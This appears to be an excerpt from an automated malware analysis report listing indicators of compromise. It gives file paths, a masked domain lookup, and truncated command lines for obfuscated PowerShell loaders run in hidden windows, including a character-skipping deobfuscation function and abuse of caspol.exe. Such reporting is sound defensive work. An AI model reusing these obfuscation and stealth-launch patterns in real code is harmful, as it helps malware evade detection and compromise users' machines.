Technical Information
- %WINDIR%\microsoft.net\framework\v4.0.30319\caspol.exe
- %WINDIR%\microsoft.net\framework\v4.0.30319\caspol.exe
- %HOMEPATH%\documents\monoatomic2.lnk
- DNS ASK ro###doors.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' "$Folkeminde = """iFSuMnPcStSiTounU SSFhIiMnTeOrGsZ0Q0F R{spHaBrRaTms(R[PSMtSrsiMnUgV]O`$nDPeMcMrSeftUaBlOiAsDtV)I;AFKoFrH(M`$TSdtGiAlIlIiSnUgBsAkGrPiNgLeQ=F1S;s R`$SSItHislplSiHnRgTsZkErYiGgSe...' (with hidden window)
- '%WINDIR%\microsoft.net\framework\v4.0.30319\caspol.exe' ' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c echo REG_SZ
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' "$Folkeminde = """iFSuMnPcStSiTounU SSFhIiMnTeOrGsZ0Q0F R{spHaBrRaTms(R[PSMtSrsiMnUgV]O`$nDPeMcMrSeftUaBlOiAsDtV)I;AFKoFrH(M`$TSdtGiAlIlIiSnUgBsAkGrPiNgLeQ=F1S;s R`$SSItHislplSiHnRgTsZkErYiGgSe...
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' "Function Shiners00 {param([String]$Decretalist);For($Stillingskrige=1; $Stillingskrige -lt $Decretalist.Length-1; $Stillingskrige+=(1+1)){$Deportee = $Deportee + $Decretalist.Substring($Stilli...
- '%WINDIR%\microsoft.net\framework\v4.0.30319\caspol.exe'